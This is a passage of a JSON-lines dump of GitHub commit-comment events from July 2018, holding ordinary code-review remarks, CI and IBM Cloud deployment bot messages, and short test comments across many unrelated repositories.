Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-28T08:32:46Z"}
{"id":"8031918609","type":"CommitCommentEvent","actor":{"login":"Janhub"},"repo":{"name":"1704102/TOSAD_BITCHES"},"payload":{"comment":{"id":29867449,"position":23,"line":23,"path":"src/main/java/com/example/jersey/database/repository/DAO/AttributeRangeDao.java","commit_id":"16dcd6010fd27bf4b6f84704349eb086ec56b84e","created_at":"2018-07-28T08:34:06Z","updated_at":"2018-07-28T08:34:06Z","author_association":"COLLABORATOR","body":"I assume this Dao will be made more generic in a future version. Now it only supports Attribute rangerule. On my branch  of this repository Ive made components generic with Java. "}},"created_at":"2018-07-28T08:34:06Z"}
{"id":"8031921225","type":"CommitCommentEvent","actor":{"login":"Phylogeny"},"repo":{"name":"Phylogeny/ExtraBitManipulation"},"payload":{"comment":{"id":29867453,"position":null,"line":null,"path":null,"commit_id":"5e5288b4c35410c0d9590691792157b6ba96ab5d","created_at":"2018-07-28T08:36:16Z","updated_at":"2018-07-28T08:36:16Z","author_association":"OWNER","body":"#20"}},"created_at":"2018-07-28T08:36:16Z"}
{"id":"8031924679","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29867471,"position":null,"line":null,"path":null,"commit_id":"1ad71293c511edb4090f945e32a6c366759b124d","created_at":"2018-07-28T08:39:10Z","updated_at":"2018-07-28T08:39:10Z","author_association":"NONE","body":"This affects also the search in line 538 which uses flipped bounds not only the the final return value. So probably all your last attempts are invalid. Sorry that i didn't notice this earlier. I thought you simply apply my fix and never looked closer at this line because it doesn't change."}},"created_at":"2018-07-28T08:39:10Z"}
{"id":"8031926401","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29867473,"position":null,"line":null,"path":null,"commit_id":"d26e48bf0524cbfdb192d6c154200625d7127141","created_at":"2018-07-28T08:40:37Z","updated_at":"2018-07-28T08:40:37Z","author_association":"NONE","body":"issue-6790-VRP-D-term (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T08:40:37Z"}
{"id":"8031928532","type":"CommitCommentEvent","actor":{"login":"Techdread"},"repo":{"name":"Techdread/04_BattleTank"},"payload":{"comment":{"id":29867474,"position":null,"line":null,"path":null,"commit_id":"c3e121d310dc1e775a6845a557c8c87425c4f764","created_at":"2018-07-28T08:42:27Z","updated_at":"2018-07-28T08:42:27Z","author_association":"OWNER","body":"Section 5, Lecture 106"}},"created_at":"2018-07-28T08:42:27Z"}
{"id":"8031929269","type":"CommitCommentEvent","actor":{"login":"MickWPM"},"repo":{"name":"MickWPM/GoogleReplication"},"payload":{"comment":{"id":29867476,"position":null,"line":null,"path":null,"commit_id":"929db8eee15734572cb71de5efc72117d252a665","created_at":"2018-07-28T08:43:05Z","updated_at":"2018-07-28T08:43:05Z","author_association":"OWNER","body":"Changed top bar links to unordered list in lieu of links inside a paragraph tag"}},"created_at":"2018-07-28T08:43:05Z"}
{"id":"8031929290","type":"CommitCommentEvent","actor":{"login":"dantleech"},"repo":{"name":"phpactor/completion"},"payload":{"comment":{"id":29867478,"position":null,"line":null,"path":null,"commit_id":"6fa0580d70eebb4166a7a361e6b8381dc7b2ad23","created_at":"2018-07-28T08:43:06Z","updated_at":"2018-07-28T08:43:06Z","author_association":"CONTRIBUTOR","body":"Thanks, I'd be happy to use that - although tbh I'm not entirely sure if skipping those characters would be a problem, could you make a PR?"}},"created_at":"2018-07-28T08:43:06Z"}
{"id":"8031929482","type":"CommitCommentEvent","actor":{"login":"Onlinehead"},"repo":{"name":"CrunchyData/postgres-operator"},"payload":{"comment":{"id":29867480,"position":null,"line":null,"path":null,"commit_id":"b9382e57f415878df45c44e15e02759db02e5753","created_at":"2018-07-28T08:43:17Z","updated_at":"2018-07-28T08:43:17Z","author_association":"NONE","body":"@mhuttner that change cause fails to start with the current default version (centos7-3.0) from values.yaml:\r\n`time=\"2018-07-28T08:36:50Z\" level=info msg=\"loading PermMap with 27 Permissions\\n\"\r\ntime=\"2018-07-28T08:36:50Z\" level=error msg=\" [ShowConfig] not a valid permission for role [pgoadmin]\\n\"`\r\nI just started to use operator, so I'm not sure is it reasonable to create a PR with update the detault version value."}},"created_at":"2018-07-28T08:43:17Z"}
{"id":"8031929720","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29867481,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T08:43:30Z","updated_at":"2018-07-28T08:43:30Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-28T08:43:30Z"}
{"id":"8031930136","type":"CommitCommentEvent","actor":{"login":"PuThiwat"},"repo":{"name":"PuThiwat/Project_Booking_status"},"payload":{"comment":{"id":29867483,"position":1,"line":1,"path":"README.md","commit_id":"19f190d530b188919b14c8832fc13463f0f72d06","created_at":"2018-07-28T08:43:51Z","updated_at":"2018-07-28T08:43:51Z","author_association":"OWNER","body":"<!--ConnectPhpMyAdmin-->\r\n<?php\r\n$con= mysqli_connect(\"localhost\", \"root\",\"\",\"projectroom\") or die(\"ไม่สามารถเชื่อข้อมูลได้\");\r\necho \"\";\r\n?>"}},"created_at":"2018-07-28T08:43:51Z"}
{"id":"8031931894","type":"CommitCommentEvent","actor":{"login":"PuThiwat"},"repo":{"name":"PuThiwat/Project_Booking_status"},"payload":{"comment":{"id":29867492,"position":3,"line":1,"path":"README.md","commit_id":"19f190d530b188919b14c8832fc13463f0f72d06","created_at":"2018-07-28T08:45:19Z","updated_at":"2018-07-28T08:45:19Z","author_association":"OWNER","body":"<!--ConnectPhpMyAdmin-->"}},"created_at":"2018-07-28T08:45:19Z"}
{"id":"8031932553","type":"CommitCommentEvent","actor":{"login":"jarlebring"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29867493,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-28T08:45:56Z","updated_at":"2018-07-28T08:45:56Z","author_association":"CONTRIBUTOR","body":"I was the one adding the type specification in `Array{T,1}(compute_Mlincomb...)` in  the newton methods. I did intentionally since I think `compute_Mlincomb` should return a vector. Nice that you reached the same conclusion. "}},"created_at":"2018-07-28T08:45:56Z"}
{"id":"8031932897","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29867495,"position":27,"line":123,"path":"x11-libs/libxcb/libxcb-1.13.recipe","commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-28T08:46:14Z","updated_at":"2018-07-28T08:46:14Z","author_association":"CONTRIBUTOR","body":"@waddlesplash should these be kept in then? haikuporter doesn't produce an \"policy error\" in strict mode?"}},"created_at":"2018-07-28T08:46:14Z"}
{"id":"8031935196","type":"CommitCommentEvent","actor":{"login":"Amdroider"},"repo":{"name":"ldqk/softs"},"payload":{"comment":{"id":29867497,"position":null,"line":null,"path":null,"commit_id":"2310ccaefb2af30c310f1ffa0e779928e8f80e81","created_at":"2018-07-28T08:48:14Z","updated_at":"2018-07-28T08:48:14Z","author_association":"NONE","body":"实在高明，实在佩服不已！！！"}},"created_at":"2018-07-28T08:48:14Z"}
{"id":"8031937552","type":"CommitCommentEvent","actor":{"login":"lypeng123"},"repo":{"name":"lypeng123/gib_fitst"},"payload":{"comment":{"id":29867499,"position":null,"line":null,"path":null,"commit_id":"0f24aeae9d35a1e46bef0c4be0d51ce6320ee8bb","created_at":"2018-07-28T08:50:17Z","updated_at":"2018-07-28T08:50:17Z","author_association":"OWNER","body":"ee"}},"created_at":"2018-07-28T08:50:17Z"}
{"id":"8031938606","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29867500,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T08:51:13Z","updated_at":"2018-07-28T08:51:13Z","author_association":"OWNER","body":"ge test"}},"created_at":"2018-07-28T08:51:13Z"}
{"id":"8031939244","type":"CommitCommentEvent","actor":{"login":"mgood7123"},"repo":{"name":"dztall/ccr_resources"},"payload":{"comment":{"id":29867505,"position":null,"line":null,"path":null,"commit_id":"9edf63c726480efc587d000ee5435fc55f2d8999","created_at":"2018-07-28T08:51:46Z","updated_at":"2018-07-28T08:51:46Z","author_association":"CONTRIBUTOR","body":"(Stable)"}},"created_at":"2018-07-28T08:51:46Z"}
{"id":"8031939779","type":"CommitCommentEvent","actor":{"login":"trang"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29867508,"position":4,"line":31,"path":"app/View/Helper/LicenseHelper.php","commit_id":"a9c01ac3e45208ef2248caffa298d60d92391f25","created_at":"2018-07-28T08:52:11Z","updated_at":"2018-07-28T08:52:11Z","author_association":"MEMBER","body":"Is this intended to be here?\r\n\r\nIt shows an error on the sentence page when there's no license.\r\n```\r\nWarning (2): assert(): assert(isset($settings['availableLicences'])) failed [APP\\View\\Helper\\LicenseHelper.php, line 31]\r\n```"}},"created_at":"2018-07-28T08:52:11Z"}
{"id":"8031940486","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29867511,"position":65,"line":65,"path":"group/assignment6/ParkingLot.java","commit_id":"fe47cdb11b332b0d504072e4dfb23939a5c51507","created_at":"2018-07-28T08:52:47Z","updated_at":"2018-07-28T08:52:47Z","author_association":"COLLABORATOR","body":"Car cant has id=0 because this id is reserved for the noCar id."}},"created_at":"2018-07-28T08:52:47Z"}
{"id":"8031941491","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29867516,"position":3,"line":2,"path":"www/nginx/Makefile","commit_id":"4c4361506092a44fca09a9cb9a2670c084118785","created_at":"2018-07-28T08:53:43Z","updated_at":"2018-07-28T08:53:43Z","author_association":"MEMBER","body":"@fichtner wrong version - 1.0 would be correct ;)"}},"created_at":"2018-07-28T08:53:43Z"}
{"id":"8031943693","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29867517,"position":3,"line":2,"path":"www/nginx/Makefile","commit_id":"4c4361506092a44fca09a9cb9a2670c084118785","created_at":"2018-07-28T08:55:41Z","updated_at":"2018-07-28T08:55:41Z","author_association":"MEMBER","body":"I would like to keep it at 0.4 to make it different from stable/18.7 where 0.3 is... when 18.7 is out I'll make 0.4 1.0 and move it to stable/18.7 for inclusion in 18.7.1 .. ok?"}},"created_at":"2018-07-28T08:55:41Z"}
{"id":"8031943818","type":"CommitCommentEvent","actor":{"login":"nagalli"},"repo":{"name":"nagalli/php-2"},"payload":{"comment":{"id":29867518,"position":null,"line":null,"path":null,"commit_id":"8ae9fbba629f93128a99d47a995649b6ed449be0","created_at":"2018-07-28T08:55:47Z","updated_at":"2018-07-28T08:55:47Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/e5aa003f-2274-485f-bb96-9046bf55c6b8?env_id=ibm%3Ayp%3Aeu-gb \"php-3\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/267e19fb-c416-470b-94f2-843f394e3b82?env_id=ibm%3Ayp%3Aeu-gb \"Pipeline-3\") deployed [php-2](https://github.com/nagalli/php-2/releases/tag/deploy-ibm-yp-eu-gb-nagalli.shivakumar-gmail.com-dev-20180728-085546 \"deploy-ibm-yp-eu-gb-nagalli.shivakumar-gmail.com-dev-20180728-085546\") to [dev](https://console.bluemix.net/apps/f729732b-dae8-44d3-9beb-5edc5213c7a8?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:nagalli.shivakumar@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-28T08:55:47Z"}
{"id":"8031945237","type":"CommitCommentEvent","actor":{"login":"coelckers"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29867520,"position":null,"line":null,"path":null,"commit_id":"79f0deaff4a3ab878d563cb1046b22d8d8334651","created_at":"2018-07-28T08:57:01Z","updated_at":"2018-07-28T08:57:01Z","author_association":"OWNER","body":"It's done right in the system's event handlers. I'm not sure about Linux, but on Windows this would be triggered before the video is fully set up and save incorrect values.\r\n\r\nThe Windows version is doing everything inside the FrameBuffer class which won't be created until much later."}},"created_at":"2018-07-28T08:57:01Z"}
{"id":"8031945955","type":"CommitCommentEvent","actor":{"login":"allenqc"},"repo":{"name":"allenqc/ikonnect2018"},"payload":{"comment":{"id":29867521,"position":null,"line":null,"path":null,"commit_id":"167603c50ed9534cb5a45767b617eac3ff3c2e57","created_at":"2018-07-28T08:57:40Z","updated_at":"2018-07-28T08:57:40Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/4456ae1b-93c7-4e12-b28d-168c156fc1a9?env_id=ibm%3Ayp%3Aus-south \"iKonnect-AllenCampano\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/870c5335-6ae3-4b94-93a6-279ea14f0988?env_id=ibm%3Ayp%3Aus-south \"IKonnectPipeline\") deployed [ikonnect2018](https://github.com/allenqc/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-campanoaq-ph.ibm.com-dev-US-20180728-085740 \"deploy-ibm-yp-us-south-campanoaq-ph.ibm.com-dev-US-20180728-085740\") to [dev-US](https://console.bluemix.net/apps/d637f90f-2883-473e-970f-fc7b607d9e56?env_id=ibm:yp:us-south \"ibm:yp:us-south:campanoaq@ph.ibm.com:dev-US\"), including this commit"}},"created_at":"2018-07-28T08:57:40Z"}
{"id":"8031946121","type":"CommitCommentEvent","actor":{"login":"adrianeusebio17"},"repo":{"name":"adrianeusebio17/ikonnect2018"},"payload":{"comment":{"id":29867522,"position":null,"line":null,"path":null,"commit_id":"47704f49c4fc1e3d3f7da5468b15b11d8431e1ea","created_at":"2018-07-28T08:57:49Z","updated_at":"2018-07-28T08:57:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7df30199-f8e4-46fb-80a3-f299a293b26b?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Adrian\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f91d5dc7-8821-49b4-9e7c-533d50c90992?env_id=ibm%3Ayp%3Aus-south \"Adrian-iKonnect\") deployed [ikonnect2018](https://github.com/adrianeusebio17/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-adrian-eusebio-adrian-eusebio-20180728-085748 \"deploy-ibm-yp-us-south-adrian-eusebio-adrian-eusebio-20180728-085748\") to [adrian-eusebio](https://console.bluemix.net/apps/5935bca3-5e67-43f9-bf94-d695862896a7?env_id=ibm:yp:us-south \"ibm:yp:us-south:adrian-eusebio:adrian-eusebio\"), including this commit"}},"created_at":"2018-07-28T08:57:49Z"}
{"id":"8031948263","type":"CommitCommentEvent","actor":{"login":"mhuttner"},"repo":{"name":"CrunchyData/postgres-operator"},"payload":{"comment":{"id":29867529,"position":null,"line":null,"path":null,"commit_id":"b9382e57f415878df45c44e15e02759db02e5753","created_at":"2018-07-28T08:59:41Z","updated_at":"2018-07-28T08:59:41Z","author_association":"CONTRIBUTOR","body":"@Onlinehead Sorry, i did not consider the change would apply to the older version in my PR, maybe this permission change should be documented separately. I think in 3.1 you would want the pgadmin to have the Permission."}},"created_at":"2018-07-28T08:59:41Z"}
{"id":"8031948633","type":"CommitCommentEvent","actor":{"login":"jordanbernabe"},"repo":{"name":"jordanbernabe/iKonnect2018."},"payload":{"comment":{"id":29867530,"position":null,"line":null,"path":null,"commit_id":"3b476d3a656d483b33bd68f45a6d08d9a960d629","created_at":"2018-07-28T08:59:59Z","updated_at":"2018-07-28T08:59:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/2f241c0a-c0bf-418f-a5ca-cddf07083ec6?env_id=ibm%3Ayp%3Aus-south \"iKonnect-jordan\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/c5d0cb8b-d396-4007-88ec-fb25aa10e07a?env_id=ibm%3Ayp%3Aus-south \"ikonnect-jordan\") deployed [iKonnect2018.](https://github.com/jordanbernabe/iKonnect2018./releases/tag/deploy-ibm-yp-us-south-bernabj-ph.ibm.com-bmxtry1-20180728-085959 \"deploy-ibm-yp-us-south-bernabj-ph.ibm.com-bmxtry1-20180728-085959\") to [bmxtry1](https://console.bluemix.net/apps/ff86355a-ce30-44d2-8910-1501376895aa?env_id=ibm:yp:us-south \"ibm:yp:us-south:bernabj@ph.ibm.com:bmxtry1\"), including this commit"}},"created_at":"2018-07-28T08:59:59Z"}
{"id":"8031952326","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29867540,"position":3,"line":2,"path":"www/nginx/Makefile","commit_id":"4c4361506092a44fca09a9cb9a2670c084118785","created_at":"2018-07-28T09:02:30Z","updated_at":"2018-07-28T09:02:30Z","author_association":"MEMBER","body":"OK. there are no bug reports so far and I don't think the new options for HTTPS upstreams do need so much attention for an extra testing period.\r\n\r\nthe current version has a small issue in the model - you may help me out here: the certificate field for a client certificate should only show entries with keys."}},"created_at":"2018-07-28T09:02:30Z"}
{"id":"8031956841","type":"CommitCommentEvent","actor":{"login":"Bartuz"},"repo":{"name":"joshukraine/mac-bootstrap"},"payload":{"comment":{"id":29867552,"position":null,"line":null,"path":null,"commit_id":"4ea310e4cc1eea1321f8db8ae7cf874db3b89000","created_at":"2018-07-28T09:06:14Z","updated_at":"2018-07-28T09:06:14Z","author_association":"NONE","body":"having in mind that you also have “brewfile” in your dotfiles I think I’ll\njust remove brew section from macOS bootstrap completely. I work on fork of\nyour repo. I liked how you manage your both repos so much! I just removed\nvim completely but all other stuff are highest quality!\n\nW dniu sobota, 28 lipca 2018 Joshua Steele <notifications@github.com>\nnapisał(a):\n\n> @Bartuz <https://github.com/Bartuz> Good question. 🙂 It's been a while\n> since I made this change, and I honestly don't remember for certain all the\n> reasons that led to it. I believe it was primarily done to make it easier\n> to stay up to date with the thoughtbot's original Laptop script. Every time\n> I update mac-bootstrap, I diff with the latest version of Laptop to see\n> what, if anything, I want to integrate.\n>\n> Bottom line: I'm open to reverting back to the Brewfile approach if you'd\n> like to do a PR. Thanks for the feedback!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/joshukraine/mac-bootstrap/commit/4ea310e4cc1eea1321f8db8ae7cf874db3b89000#commitcomment-29866492>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEL3RKQ1gLttS2m9zgd07ULTqkfFwwYDks5uK-0wgaJpZM4VffEX>\n> .\n>\n"}},"created_at":"2018-07-28T09:06:14Z"}
{"id":"8031958597","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29867555,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T09:07:48Z","updated_at":"2018-07-28T09:07:48Z","author_association":"OWNER","body":"go test\r\n"}},"created_at":"2018-07-28T09:07:48Z"}
{"id":"8031961192","type":"CommitCommentEvent","actor":{"login":"sennevb"},"repo":{"name":"karel-3d/bitcoinjs-lib"},"payload":{"comment":{"id":29867557,"position":null,"line":null,"path":null,"commit_id":"e35940d39c0548d8d5734b3bf5668d249e19a410","created_at":"2018-07-28T09:10:09Z","updated_at":"2018-07-28T09:10:09Z","author_association":"NONE","body":"This change breaks all equihash coins that havent pulled overwinter upgrade from upstream yet.\r\nYou will get a block decode failed when submitting a block in znomp\r\n\r\nHellcatz's commit works for both:\r\nhttps://github.com/karel-3d/bitcoinjs-lib/commit/ceac78a4aa83ee502b2a1c2b1a45a83050f3141c\r\n\r\nPlease look into this, will raise an issue aswell"}},"created_at":"2018-07-28T09:10:09Z"}
{"id":"8031961566","type":"CommitCommentEvent","actor":{"login":"twitu"},"repo":{"name":"Kuyas/Welfare"},"payload":{"comment":{"id":29867558,"position":null,"line":null,"path":null,"commit_id":"30bd719cc7a344995ff126a18e44968ce182164a","created_at":"2018-07-28T09:10:27Z","updated_at":"2018-07-28T09:10:27Z","author_association":"COLLABORATOR","body":"God level changes. The app would have failed without them. Great work."}},"created_at":"2018-07-28T09:10:27Z"}
{"id":"8031961631","type":"CommitCommentEvent","actor":{"login":"vanessaguerra13"},"repo":{"name":"vanessaguerra13/ikonnect2018"},"payload":{"comment":{"id":29867560,"position":null,"line":null,"path":null,"commit_id":"b3ff74c843175fa0ef96baebfb9e2fbb24be887d","created_at":"2018-07-28T09:10:30Z","updated_at":"2018-07-28T09:10:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8f9c156c-e129-45d5-97ea-2c902d789d01?env_id=ibm%3Ayp%3Aus-south \"ikonnect-Bambi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5f6b9cda-ff06-4f2a-93ec-df795c847eeb?env_id=ibm%3Ayp%3Aus-south \"Bambina\") deployed [ikonnect2018](https://github.com/vanessaguerra13/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-vanessavguerra-yahoo.com-dev-20180728-091030 \"deploy-ibm-yp-us-south-vanessavguerra-yahoo.com-dev-20180728-091030\") to [dev](https://console.bluemix.net/apps/61875cc2-3121-4398-a884-108d7ded2b9c?env_id=ibm:yp:us-south \"ibm:yp:us-south:vanessavguerra@yahoo.com:dev\"), including this commit"}},"created_at":"2018-07-28T09:10:30Z"}
{"id":"8031961755","type":"CommitCommentEvent","actor":{"login":"fieryorc"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":29867561,"position":null,"line":null,"path":null,"commit_id":"42fa6b2c28270333d5e7acc81e4de59e291e13c4","created_at":"2018-07-28T09:10:36Z","updated_at":"2018-07-28T09:10:36Z","author_association":"NONE","body":"I can't repro this anyomre. I had old DB and might be caused by that. "}},"created_at":"2018-07-28T09:10:36Z"}
{"id":"8031962151","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867564,"position":null,"line":null,"path":null,"commit_id":"f1c35111dcbfad99657af4006c7590b2a60c12a0","created_at":"2018-07-28T09:10:58Z","updated_at":"2018-07-28T09:10:58Z","author_association":"MEMBER","body":"This blows up the line count by 300% and style size by around 50% for the benefit of having original ordering which solves a lot of issues related to CSS's precedency by ordering. Not sure if it's worth yet or if we should just fix these issues manually."}},"created_at":"2018-07-28T09:10:58Z"}
{"id":"8031962915","type":"CommitCommentEvent","actor":{"login":"LianWK1"},"repo":{"name":"DuGuQiuBai/Java"},"payload":{"comment":{"id":29867568,"position":25,"line":25,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-28T09:11:38Z","updated_at":"2018-07-28T09:11:38Z","author_association":"NONE","body":"法国红酒快乐； "}},"created_at":"2018-07-28T09:11:38Z"}
{"id":"8031963153","type":"CommitCommentEvent","actor":{"login":"CaraBelvez1"},"repo":{"name":"CaraBelvez1/ikonnect2018"},"payload":{"comment":{"id":29867569,"position":null,"line":null,"path":null,"commit_id":"8555fca163e2a7781ed541d973f4f0fe2cb19e02","created_at":"2018-07-28T09:11:52Z","updated_at":"2018-07-28T09:11:52Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/27e98655-0b38-45a3-96f4-6fa9175aabe4?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Cara Belvez\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/0aa97578-afa2-40f8-8237-5667a4f7713a?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Cara\") deployed [ikonnect2018](https://github.com/CaraBelvez1/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-parascc-ph.ibm.com-iKonnect-Cara-20180728-091152 \"deploy-ibm-yp-us-south-parascc-ph.ibm.com-iKonnect-Cara-20180728-091152\") to [iKonnect-Cara](https://console.bluemix.net/apps/964fdaf5-fcc2-4612-bfb9-4b6d18ecc092?env_id=ibm:yp:us-south \"ibm:yp:us-south:parascc@ph.ibm.com:iKonnect-Cara\"), including this commit"}},"created_at":"2018-07-28T09:11:52Z"}
{"id":"8031963444","type":"CommitCommentEvent","actor":{"login":"jQuery69"},"repo":{"name":"CypherCore/CypherCore"},"payload":{"comment":{"id":29867570,"position":null,"line":null,"path":null,"commit_id":"8673e7218d5ec5bbf57cd25c60613752ff9df855","created_at":"2018-07-28T09:12:09Z","updated_at":"2018-07-28T09:12:09Z","author_association":"NONE","body":"This is awesome ! Keep up the awesome work with the C# core!"}},"created_at":"2018-07-28T09:12:09Z"}
{"id":"8031963597","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29867571,"position":21,"line":14,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"c86ae3da0e31f545b2741b0829b9ee7ef47f5294","created_at":"2018-07-28T09:12:16Z","updated_at":"2018-07-28T09:12:16Z","author_association":"NONE","body":"Java позволяет обращаться к статичным членам через объекты, но на мой взгляд, это не лучшая практика. Если подразумевается. что метод будет вызываться через объект, то лучше его определить как нестатический."}},"created_at":"2018-07-28T09:12:16Z"}
{"id":"8031963764","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867572,"position":null,"line":null,"path":null,"commit_id":"56e7b909bf2e8d6022e6d906ed42823ec683c927","created_at":"2018-07-28T09:12:24Z","updated_at":"2018-07-28T09:12:24Z","author_association":"MEMBER","body":"This blows up the line count by 300% and style size by around 50% for the benefit of having original ordering which solves a lot of issues related to CSS's precedency by ordering. Not sure if it's worth yet or if we should just fix these issues manually."}},"created_at":"2018-07-28T09:12:24Z"}
{"id":"8031964365","type":"CommitCommentEvent","actor":{"login":"lal1936636210"},"repo":{"name":"Jannchie/Historical-ranking-data-visualization-based-on-d3.js"},"payload":{"comment":{"id":29867573,"position":2,"line":2,"path":"dist/color.css","commit_id":"4c7a743bf66b0fe3c4bc54b6014b1ca80eabeb10","created_at":"2018-07-28T09:12:55Z","updated_at":"2018-07-28T09:12:55Z","author_association":"NONE","body":"001"}},"created_at":"2018-07-28T09:12:55Z"}
{"id":"8031964799","type":"CommitCommentEvent","actor":{"login":"miketeo"},"repo":{"name":"miketeo/pysmb"},"payload":{"comment":{"id":29867575,"position":null,"line":null,"path":null,"commit_id":"3175e8ef89205374deb95c2b40176447303ccfee","created_at":"2018-07-28T09:13:18Z","updated_at":"2018-07-28T09:13:18Z","author_association":"OWNER","body":"Fix #112 "}},"created_at":"2018-07-28T09:13:18Z"}
{"id":"8031965376","type":"CommitCommentEvent","actor":{"login":"vanessaguerra13"},"repo":{"name":"vanessaguerra13/ikonnect2018"},"payload":{"comment":{"id":29867576,"position":null,"line":null,"path":null,"commit_id":"5e75f984d465efc1aaddd410a96dc16dc9932188","created_at":"2018-07-28T09:13:50Z","updated_at":"2018-07-28T09:13:50Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8f9c156c-e129-45d5-97ea-2c902d789d01?env_id=ibm%3Ayp%3Aus-south \"ikonnect-Bambi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5f6b9cda-ff06-4f2a-93ec-df795c847eeb?env_id=ibm%3Ayp%3Aus-south \"Bambina\") deployed [ikonnect2018](https://github.com/vanessaguerra13/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-vanessavguerra-yahoo.com-dev-20180728-091350 \"deploy-ibm-yp-us-south-vanessavguerra-yahoo.com-dev-20180728-091350\") to [dev](https://console.bluemix.net/apps/61875cc2-3121-4398-a884-108d7ded2b9c?env_id=ibm:yp:us-south \"ibm:yp:us-south:vanessavguerra@yahoo.com:dev\"), including this commit"}},"created_at":"2018-07-28T09:13:50Z"}
{"id":"8031965799","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29867577,"position":3,"line":2,"path":"www/nginx/Makefile","commit_id":"4c4361506092a44fca09a9cb9a2670c084118785","created_at":"2018-07-28T09:14:13Z","updated_at":"2018-07-28T09:14:13Z","author_association":"MEMBER","body":"Don't know the cert field logic. Need to finish 18.7 now till Tuesday so I can't have a quick look. Sorry!"}},"created_at":"2018-07-28T09:14:13Z"}
{"id":"8031965973","type":"CommitCommentEvent","actor":{"login":"LinuxCrafts"},"repo":{"name":"justalinko/dbackres"},"payload":{"comment":{"id":29867579,"position":190,"line":190,"path":"LICENSE","commit_id":"1539893bb5673b421c3dd2e4ca2c46c678f82de2","created_at":"2018-07-28T09:14:22Z","updated_at":"2018-07-28T09:14:22Z","author_association":"NONE","body":"FORGOT TO ADD:\r\nyear of copyright\r\nname of owner"}},"created_at":"2018-07-28T09:14:22Z"}
